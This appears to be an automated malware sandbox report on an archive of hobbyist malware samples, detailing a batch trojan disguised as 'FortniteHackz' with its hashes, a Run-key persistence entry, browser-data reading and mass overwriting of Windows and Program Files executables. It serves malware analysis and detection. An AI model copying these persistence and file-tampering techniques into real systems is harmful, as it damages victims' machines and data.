Overview
overview
10Static
static
5My-Skidded...in.zip
windows11-21h2-x64
1My-Skidded...f2.exe
windows11-21h2-x64
8My-Skidded...Us.vbs
windows11-21h2-x64
1My-Skidded...AT.exe
windows11-21h2-x64
10My-Skidded...UN.exe
windows11-21h2-x64
10My-Skidded...no.exe
windows11-21h2-x64
6My-Skidded...!!.zip
windows11-21h2-x64
1My-Skidded...MK.exe
windows11-21h2-x64
My-Skidded...ck.vbs
windows11-21h2-x64
1My-Skidded...it.exe
windows11-21h2-x64
7My-Skidded... 2.bat
windows11-21h2-x64
3My-Skidded...OR.vbs
windows11-21h2-x64
1My-Skidded...ge.exe
windows11-21h2-x64
My-Skidded...ck.exe
windows11-21h2-x64
10My-Skidded...BR.exe
windows11-21h2-x64
My-Skidded...ba.vbs
windows11-21h2-x64
1My-Skidded...ad.exe
windows11-21h2-x64
My-Skidded...BR.exe
windows11-21h2-x64
6My-Skidded...AL.exe
windows11-21h2-x64
6My-Skidded...en.exe
windows11-21h2-x64
6My-Skidded...in.exe
windows11-21h2-x64
6My-Skidded...BR.exe
windows11-21h2-x64
My-Skidded...64.exe
windows11-21h2-x64
My-Skidded...64.exe
windows11-21h2-x64
10My-Skidded...24.exe
windows11-21h2-x64
10My-Skidded...DME.md
windows11-21h2-x64
3My-Skidded....0.bat
windows11-21h2-x64
3My-Skidded...as.exe
windows11-21h2-x64
My-Skidded...ll.bat
windows11-21h2-x64
My-Skidded...ks.exe
windows11-21h2-x64
My-Skidded...ua.exe
windows11-21h2-x64
My-Skidded...kz.bat
windows11-21h2-x64
8Resubmissions
09/03/2025, 01:58
250309-cdv29swybs 1008/03/2025, 06:55
250308-hp35xatjt9 1008/03/2025, 04:53
250308-fh1ebssky5 10Analysis
-
max time kernel
85s -
max time network
156s -
platform
windows11-21h2_x64 -
resource
win11-20250217-en -
resource tags
arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system -
submitted
08/03/2025, 06:55
Behavioral task
behavioral1
Sample
My-Skidded-malwares-main.zip
Resource
win11-20250217-en
windows11-21h2-x64
Behavioral task
behavioral2
Sample
My-Skidded-malwares-main/6abdd72e82088f5aab90dc9e02f2d9781cea1b3f1c84b3f16df4810956f68ef2.exe
Resource
win11-20250217-en
windows11-21h2-x64
Behavioral task
behavioral3
Sample
My-Skidded-malwares-main/AmongUs.vbs
Resource
win11-20250217-en
windows11-21h2-x64
Behavioral task
behavioral4
Sample
My-Skidded-malwares-main/AnaRAT.exe
Resource
win11-20250217-en
windows11-21h2-x64
Behavioral task
behavioral5
Sample
My-Skidded-malwares-main/CRINGE-DO-NOT-RUN.exe
Resource
win11-20250217-en
windows11-21h2-x64
Behavioral task
behavioral6
Sample
My-Skidded-malwares-main/Cirno.exe
Resource
win11-20250217-en
windows11-21h2-x64
Behavioral task
behavioral7
Sample
My-Skidded-malwares-main/Cool Game MAKR 2022!!.zip
Resource
win11-20250217-en
windows11-21h2-x64
Behavioral task
behavioral8
Sample
My-Skidded-malwares-main/DAMK.exe
Resource
win11-20250218-en
windows11-21h2-x64
Behavioral task
behavioral9
Sample
My-Skidded-malwares-main/Dell_Fuck.vbs
Resource
win11-20250217-en
windows11-21h2-x64
Behavioral task
behavioral10
Sample
My-Skidded-malwares-main/Discord Expliot Kit.exe
Resource
win11-20250217-en
windows11-21h2-x64
Behavioral task
behavioral11
Sample
My-Skidded-malwares-main/ERROR 2.bat
Resource
win11-20250217-en
windows11-21h2-x64
Behavioral task
behavioral12
Sample
My-Skidded-malwares-main/ERROR.vbs
Resource
win11-20250217-en
windows11-21h2-x64
Behavioral task
behavioral13
Sample
My-Skidded-malwares-main/Fello_s_Revenge.exe
Resource
win11-20250217-en
windows11-21h2-x64
Behavioral task
behavioral14
Sample
My-Skidded-malwares-main/Fellos RAT-Pack.exe
Resource
win11-20250217-en
windows11-21h2-x64
Behavioral task
behavioral15
Sample
My-Skidded-malwares-main/KonataMBR.exe
Resource
win11-20250217-en
windows11-21h2-x64
Behavioral task
behavioral16
Sample
My-Skidded-malwares-main/KonoSuba.vbs
Resource
win11-20250217-en
windows11-21h2-x64
Behavioral task
behavioral17
Sample
My-Skidded-malwares-main/MarisaFumoDownload.exe
Resource
win11-20250217-en
windows11-21h2-x64
Behavioral task
behavioral18
Sample
My-Skidded-malwares-main/MarisaMBR.exe
Resource
win11-20250217-en
windows11-21h2-x64
Behavioral task
behavioral19
Sample
My-Skidded-malwares-main/Marlon2210FACEREVEAL.exe
Resource
win11-20250217-en
windows11-21h2-x64
Behavioral task
behavioral20
Sample
My-Skidded-malwares-main/Marlon2210KeyGen.exe
Resource
win11-20250218-en
windows11-21h2-x64
Behavioral task
behavioral21
Sample
My-Skidded-malwares-main/Megumin.exe
Resource
win11-20250217-en
windows11-21h2-x64
Behavioral task
behavioral22
Sample
My-Skidded-malwares-main/NazrinMBR.exe
Resource
win11-20250217-en
windows11-21h2-x64
Behavioral task
behavioral23
Sample
My-Skidded-malwares-main/PCCooker2.0_x64.exe
Resource
win11-20250217-en
windows11-21h2-x64
Behavioral task
behavioral24
Sample
My-Skidded-malwares-main/PCCooker_x64.exe
Resource
win11-20250217-en
windows11-21h2-x64
Behavioral task
behavioral25
Sample
My-Skidded-malwares-main/PanKoza2.0 Discord Token Stealer 2024.exe
Resource
win11-20250217-en
windows11-21h2-x64
Behavioral task
behavioral26
Sample
My-Skidded-malwares-main/README.md
Resource
win11-20250217-en
windows11-21h2-x64
Behavioral task
behavioral27
Sample
My-Skidded-malwares-main/RaM KilLEr 1.0.bat
Resource
win11-20250217-en
windows11-21h2-x64
Behavioral task
behavioral28
Sample
My-Skidded-malwares-main/Rias.exe
Resource
win11-20250217-en
windows11-21h2-x64
Behavioral task
behavioral29
Sample
My-Skidded-malwares-main/Run All.bat
Resource
win11-20250217-en
windows11-21h2-x64
Behavioral task
behavioral30
Sample
My-Skidded-malwares-main/TouhouHacks.exe
Resource
win11-20250217-en
windows11-21h2-x64
Behavioral task
behavioral31
Sample
My-Skidded-malwares-main/Trojan.Aqua.exe
Resource
win11-20250218-en
windows11-21h2-x64
Behavioral task
behavioral32
Sample
My-Skidded-malwares-main/Trojan.Bat.FortniteHackz.bat
Resource
win11-20250217-en
windows11-21h2-x64
General
-
Target
My-Skidded-malwares-main/Trojan.Bat.FortniteHackz.bat
-
Size
34KB
-
MD5
ac04b6f6fa293c4b55c4c8b49372a9ec
-
SHA1
9dfca519218c3c10203163454f1237916b0655cc
-
SHA256
273f4b1732968174b95b549e1fec0b61181404b820a0d8f1b8dec9c32686bd92
-
SHA512
b560feee161c2300b3145026dd5faa0ca3b4edbcaa88a8d68854d26b0c1a6087370af5da707b2fb61c5ca0b363a5786f5e7eeba2ed1fe5ae863347f018889086
-
SSDEEP
192:9TIqVppLuLpDq7QYfLGMV+jasHHLgLxLR44444444444444444M666666666666Q:9rVppLuLpDq7QYfLGMV+jasHHLgLxi
Malware Config
Signatures
-
Drops file in Drivers directory 4 IoCs
description ioc Process File created C:\Windows\SysWOW64\drivers\gmreadme.txt cmd.exe File opened for modification C:\Windows\System32\drivers\gmreadme.txt cmd.exe File created C:\Windows\System32\drivers\gmreadme.txt cmd.exe File opened for modification C:\Windows\SysWOW64\drivers\gmreadme.txt cmd.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_12735_toolbar = "C:\\Users\\Admin\\AppData\\Local\\Temp\\My-Skidded-malwares-main\\Trojan.Bat.FortniteHackz.bat" reg.exe -
Drops file in System32 directory 64 IoCs
description ioc Process File created C:\Windows\System32\appidpolicyconverter.exe cmd.exe File opened for modification C:\Windows\System32\SearchProtocolHost.exe cmd.exe File created C:\Windows\SysWOW64\forfiles.exe cmd.exe File opened for modification C:\Windows\SysWOW64\mshta.exe cmd.exe File opened for modification C:\Windows\SysWOW64\OposHost.exe cmd.exe File opened for modification C:\Windows\SysWOW64\setupugc.exe cmd.exe File opened for modification C:\Windows\System32\printui.exe cmd.exe File opened for modification C:\Windows\System32\proquota.exe cmd.exe File created C:\Windows\System32\taskhostw.exe cmd.exe File created C:\Windows\System32\SystemResetPlatform\SystemResetPlatform.exe cmd.exe File created C:\Windows\SysWOW64\SystemPropertiesProtection.exe cmd.exe File created C:\Windows\System32\DeviceCredentialDeployment.exe cmd.exe File created C:\Windows\System32\net1.exe cmd.exe File created C:\Windows\System32\Netplwiz.exe cmd.exe File opened for modification C:\Windows\System32\where.exe cmd.exe File opened for modification C:\Windows\SysWOW64\CloudNotifications.exe cmd.exe File created C:\Windows\SysWOW64\sc.exe cmd.exe File created C:\Windows\SysWOW64\shutdown.exe cmd.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe cmd.exe File created C:\Windows\SysWOW64\fsutil.exe cmd.exe File opened for modification C:\Windows\SysWOW64\systeminfo.exe cmd.exe File opened for modification C:\Windows\System32\ddodiag.exe cmd.exe File created C:\Windows\SysWOW64\mcbuilder.exe cmd.exe File created C:\Windows\System32\lpksetup.exe cmd.exe File opened for modification C:\Windows\System32\rmttpmvscmgrsvr.exe cmd.exe File opened for modification C:\Windows\System32\SystemPropertiesDataExecutionPrevention.exe cmd.exe File created C:\Windows\System32\verclsid.exe cmd.exe File opened for modification C:\Windows\SysWOW64\findstr.exe cmd.exe File opened for modification C:\Windows\SysWOW64\fsutil.exe cmd.exe File created C:\Windows\SysWOW64\msdt.exe cmd.exe File opened for modification C:\Windows\SysWOW64\winver.exe cmd.exe File opened for modification C:\Windows\System32\DisplaySwitch.exe cmd.exe File opened for modification C:\Windows\System32\setupugc.exe cmd.exe File created C:\Windows\System32\write.exe cmd.exe File opened for modification C:\Windows\System32\WWAHost.exe cmd.exe File created C:\Windows\System32\lsass.exe cmd.exe File opened for modification C:\Windows\System32\powercfg.exe cmd.exe File opened for modification C:\Windows\System32\sdiagnhost.exe cmd.exe File created C:\Windows\System32\dusmtask.exe cmd.exe File opened for modification C:\Windows\System32\mavinject.exe cmd.exe File opened for modification C:\Windows\System32\wslg.exe cmd.exe File opened for modification C:\Windows\SysWOW64\whoami.exe cmd.exe File opened for modification C:\Windows\System32\tskill.exe cmd.exe File opened for modification C:\Windows\System32\UserAccountBroker.exe cmd.exe File created C:\Windows\SysWOW64\prevhost.exe cmd.exe File opened for modification C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk cmd.exe File opened for modification C:\Windows\System32\AtBroker.exe cmd.exe File opened for modification C:\Windows\System32\DWWIN.EXE cmd.exe File created C:\Windows\SysWOW64\ndadmin.exe cmd.exe File opened for modification C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe cmd.exe File opened for modification C:\Windows\System32\replace.exe cmd.exe File opened for modification C:\Windows\System32\dfrgui.exe cmd.exe File created C:\Windows\System32\gpresult.exe cmd.exe File created C:\Windows\System32\HOSTNAME.EXE cmd.exe File opened for modification C:\Windows\System32\IESettingSync.exe cmd.exe File created C:\Windows\System32\TapiUnattend.exe cmd.exe File created C:\Windows\SysWOW64\calc.exe cmd.exe File opened for modification C:\Windows\SysWOW64\taskkill.exe cmd.exe File opened for modification C:\Windows\SysWOW64\PackagedCWALauncher.exe cmd.exe File created C:\Windows\System32\alg.exe cmd.exe File created C:\Windows\System32\winload.exe cmd.exe File opened for modification C:\Windows\SysWOW64\wermgr.exe cmd.exe File created C:\Windows\SysWOW64\WWAHost.exe cmd.exe File created C:\Windows\SysWOW64\IME\IMEJP\IMJPDCT.EXE cmd.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Internet Explorer\ielowutil.exe cmd.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe cmd.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\Client2019_eula.txt cmd.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\InspectorOfficeGadget.exe cmd.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\rmiregistry.exe cmd.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\wt.exe cmd.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\notification_helper.exe cmd.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\BHO\ie_to_edge_stub.exe cmd.exe File created C:\Program Files (x86)\Windows Media Player\wmpshare.exe cmd.exe File opened for modification C:\Program Files\7-Zip\Lang\lij.txt cmd.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Adobe\Products.txt cmd.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\msoev.exe cmd.exe File opened for modification C:\Program Files\7-Zip\Lang\sl.txt cmd.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt cmd.exe File created C:\Program Files\Internet Explorer\iexplore.exe cmd.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\pack200.exe cmd.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\OpenConsole.exe cmd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe cmd.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\90.0.818.66\pwahelper.exe cmd.exe File opened for modification C:\Program Files\7-Zip\Lang\uz.txt cmd.exe File created C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.42251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe cmd.exe File created C:\Program Files\WindowsApps\Microsoft.Todos_0.33.33351.0_x64__8wekyb3d8bbwe\Todo.exe cmd.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeUpdateComRegisterShell64.exe cmd.exe File created C:\Program Files (x86)\Windows Mail\wabmig.exe cmd.exe File created C:\Program Files (x86)\Windows NT\TableTextService\TableTextServiceDaYi.txt cmd.exe File created C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe cmd.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\notification_helper.exe cmd.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\LyncBasic_Eula.txt cmd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT cmd.exe File opened for modification C:\Program Files\7-Zip\History.txt cmd.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jvm.hprof.txt cmd.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\WacLangPackEula.txt cmd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\COPYING.LGPLv2.1.txt cmd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT cmd.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\README_en_GB.txt cmd.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\servertool.exe cmd.exe File opened for modification C:\Program Files\Mozilla Firefox\minidump-analyzer.exe cmd.exe File opened for modification C:\Program Files\7-Zip\Lang\sv.txt cmd.exe File opened for modification C:\Program Files\7-Zip\Lang\sw.txt cmd.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\SkypeForBusinessBasic2019_eula.txt cmd.exe File opened for modification C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\en-US\about_should.help.txt cmd.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\javaw.exe cmd.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\MSOHTMED.EXE cmd.exe File created C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.42251.0_x64__8wekyb3d8bbwe\AppInstallerElevatedAppServiceClient.exe cmd.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateOnDemand.exe cmd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf cmd.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\AccessRuntime_eula.txt cmd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT cmd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_2.2106.2807.0_x64__8wekyb3d8bbwe\Cortana.exe cmd.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.43\MicrosoftEdgeUpdateCore.exe cmd.exe File opened for modification C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe cmd.exe File created C:\Program Files\Internet Explorer\ieinstal.exe cmd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.GamingApp_2105.900.24.0_x64__8wekyb3d8bbwe\XboxStub.exe cmd.exe File opened for modification C:\Program Files\7-Zip\Lang\ext.txt cmd.exe File opened for modification C:\Program Files\7-Zip\Lang\lv.txt cmd.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt cmd.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\orbd.exe cmd.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe cmd.exe File opened for modification C:\Program Files\Windows Media Player\setup_wm.exe cmd.exe File created C:\Program Files (x86)\Internet Explorer\ExtExport.exe cmd.exe File opened for modification C:\Program Files\7-Zip\Lang\cs.txt cmd.exe File opened for modification C:\Program Files\Java\jre-1.8\THIRDPARTYLICENSEREADME.txt cmd.exe File opened for modification C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\en-US\about_Mocking.help.txt cmd.exe File created C:\Program Files\Internet Explorer\iediagcmd.exe cmd.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-p..rnetprinting-client_31bf3856ad364e35_10.0.22000.282_none_85f8b97e4dbf9185\f\wpnpinst.exe cmd.exe File created C:\Windows\WinSxS\wow64_microsoft-windows-m..ommandlineutilities_31bf3856ad364e35_10.0.22000.1_none_ddb5359fa07e69e6\doskey.exe cmd.exe File created C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe cmd.exe File opened for modification C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\f\WerFaultSecure.exe cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-blb-engine-main_31bf3856ad364e35_10.0.22000.1_none_3a25939e0488fc49\wbengine.exe cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-m..ndation-frameserver_31bf3856ad364e35_10.0.22000.469_none_b104ba5249e06dec\r\FsIso.exe cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-recoverydrive_31bf3856ad364e35_10.0.22000.132_none_23ef129810e14356\r\RecoveryDrive.exe cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-s..or-native-serverbox_31bf3856ad364e35_10.0.22000.120_none_6b23f06ce93f4f52\f\RMActivate_ssp.exe cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_3af3f70bfdcd4fb1\change.exe cmd.exe File opened for modification C:\Windows\WinSxS\amd64_windows-defender-service_31bf3856ad364e35_10.0.22000.1_none_1be9c0745b95a762\MpCmdRun.exe cmd.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-windowscodecraw_31bf3856ad364e35_10.0.22000.132_none_9aa67d897151144d\WindowsCodecsRaw.txt cmd.exe File opened for modification C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.22000.120_none_dd24c7cd1fc6d4b1\f\PeopleExperienceHost.exe cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-a..nagement-appvclient_31bf3856ad364e35_10.0.22000.318_none_c7ea7e014d4524f4\AppVShNotify.exe cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_10.0.22000.318_none_569ec118f1c50925\f\winload.exe cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-setup-component_31bf3856ad364e35_10.0.22000.376_none_2d61a5193292e66c\Setup.exe cmd.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-advancedtaskmanager_31bf3856ad364e35_10.0.22000.65_none_9b4fcb543bd21a13\r\LaunchTM.exe cmd.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-appidcore_31bf3856ad364e35_10.0.22000.318_none_349d8ac96fe3d679\f\appidtel.exe cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-s..e.desktop.searchapp_31bf3856ad364e35_10.0.22000.1_none_e4512f709bf99514\7.txt cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-onecore-i..atedusermode-kernel_31bf3856ad364e35_10.0.22000.348_none_e313cfb919daa6b1\securekernel.exe cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-systemreset_31bf3856ad364e35_10.0.22000.469_none_e653782f0144d814\ResetEngine.exe cmd.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-c..plus-setup-migregdb_31bf3856ad364e35_10.0.22000.1_none_8de8e95b9cda88b4\MigRegDB.exe cmd.exe File opened for modification C:\Windows\WinSxS\x86_wpf-presentationhostexe_31bf3856ad364e35_10.0.22000.1_none_6a1935736c898073\PresentationHost.exe cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-g..ation-wincomponents_31bf3856ad364e35_10.0.22000.1_none_f20a18a4fd0f4d43\LocationNotificationWindows.exe cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-msconfig-exe_31bf3856ad364e35_10.0.22000.71_none_bcb9c63bb991a4c6\r\msconfig.exe cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-nbtstat_31bf3856ad364e35_10.0.22000.1_none_f4542218232805ca\nbtstat.exe cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.22000.1_none_b7671877039e31c8\relog.exe cmd.exe File created C:\Windows\WinSxS\wow64_microsoft-windows-tcpip-utility_31bf3856ad364e35_10.0.22000.1_none_935f3ba28807f81e\HOSTNAME.EXE cmd.exe File opened for modification C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe cmd.exe File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe cmd.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe cmd.exe File created C:\Windows\Microsoft.NET\Framework64\v3.5\EdmGen.exe cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.22000.348_none_30982568e4ff2521\f\vmwp.exe cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-security-spp-ux-dlg_31bf3856ad364e35_10.0.22000.1_none_f49ae11ddec89744\UpgradeResultsUI.exe cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-setup-component_31bf3856ad364e35_10.0.22000.376_none_2d61a5193292e66c\audit.exe cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-systemreset_31bf3856ad364e35_10.0.22000.469_none_e653782f0144d814\r\systemreset.exe cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-s..e.desktop.searchapp_31bf3856ad364e35_10.0.22000.1_none_e4512f709bf99514\18.txt cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-client-li..m-service-migration_31bf3856ad364e35_10.0.22000.120_none_9268b7169b04c4a6\r\ClipUp.exe cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-fileexplorer.appxmain_31bf3856ad364e35_10.0.22000.120_none_64d060998298410d\r\FileExplorer.exe cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-where_31bf3856ad364e35_10.0.22000.1_none_b416d6c5e2f3a677\where.exe cmd.exe File created C:\Windows\WinSxS\amd64_netfx4-aspnet_regiis_exe_b03f5f7f11d50a3a_4.0.15806.0_none_814d9cd431d93bd0\aspnet_regiis.exe cmd.exe File opened for modification C:\Windows\WinSxS\amd64_security-octagon-broker_31bf3856ad364e35_10.0.22000.1_none_b04edc9391a3bdbd\SgrmLpac.exe cmd.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_windows-defender-service_31bf3856ad364e35_10.0.22000.1_none_1be9c0745b95a762_mpdlpcmd.exe_f16d1925 cmd.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-audio-audiocore_31bf3856ad364e35_10.0.22000.348_none_7c4c059b9e36fe85\SpatialAudioLicenseSrv.exe cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-explorer-shortcuts_31bf3856ad364e35_10.0.22000.51_none_99f76de22cbda898\05 - Device Manager.lnk cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-ie-ielowutil_31bf3856ad364e35_11.0.22000.1_none_90ab24a4e0ddab72\ielowutil.exe cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-msinfo32-exe-common_31bf3856ad364e35_10.0.22000.71_none_688486d306b27285\msinfo32.exe cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-refsutil_31bf3856ad364e35_10.0.22000.1_none_40fab150342df168\refsutil.exe cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-security-tools-klist_31bf3856ad364e35_10.0.22000.282_none_3c5af3814be830ab\r\klist.exe cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-setup-component_31bf3856ad364e35_10.0.22000.376_none_2d61a5193292e66c\r\Setup.exe cmd.exe File opened for modification C:\Windows\WinSxS\amd64_windows-senseclient-service_31bf3856ad364e35_10.0.22000.376_none_a359e3d81485694b\SenseIR.exe cmd.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-autoplay_31bf3856ad364e35_10.0.22000.1_none_7b92f89679249548\wmlaunch.exe cmd.exe File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-windowscodecraw_31bf3856ad364e35_10.0.22000.132_none_9051d3373cf05252\f\WindowsCodecsRaw.txt cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-d..directplay8-payload_31bf3856ad364e35_10.0.22000.1_none_59c3860dc8ae77d0\dpnsvr.exe cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.282_none_6b2d7072c225a87c\f\WerFaultSecure.exe cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-migrationengine_31bf3856ad364e35_10.0.22000.348_none_53ff6ed560767984\r\mighost.exe cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-narrator_31bf3856ad364e35_10.0.22000.100_none_b998a9a728d6401f\r\Narrator.exe cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-winrsplugins_31bf3856ad364e35_10.0.22000.1_none_6c7a140d3670631f\winrshost.exe cmd.exe File created C:\Windows\WinSxS\wow64_microsoft-windows-where_31bf3856ad364e35_10.0.22000.1_none_be6b811817546872\where.exe cmd.exe File created C:\Windows\WinSxS\wow64_windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_5f6e7d4cbd14f8f7\r\SearchIndexer.exe cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.22000.493_none_7f8453c6e0afd8f5\nvspinfo.exe cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-m..-odbc-administrator_31bf3856ad364e35_10.0.22000.1_none_9a93850442801f9d\odbcad32.exe cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-sysinfo_31bf3856ad364e35_10.0.22000.1_none_45984ec0fd57e0f5\systeminfo.exe cmd.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-s..ative-serverbox-isv_31bf3856ad364e35_10.0.22000.120_none_fad0aab9b7fd2208\f\RMActivate_ssp_isv.exe cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-eventlog-commandline_31bf3856ad364e35_10.0.22000.469_none_bc172f1a0215d298\f\wevtutil.exe cmd.exe -
Modifies registry class 14 IoCs
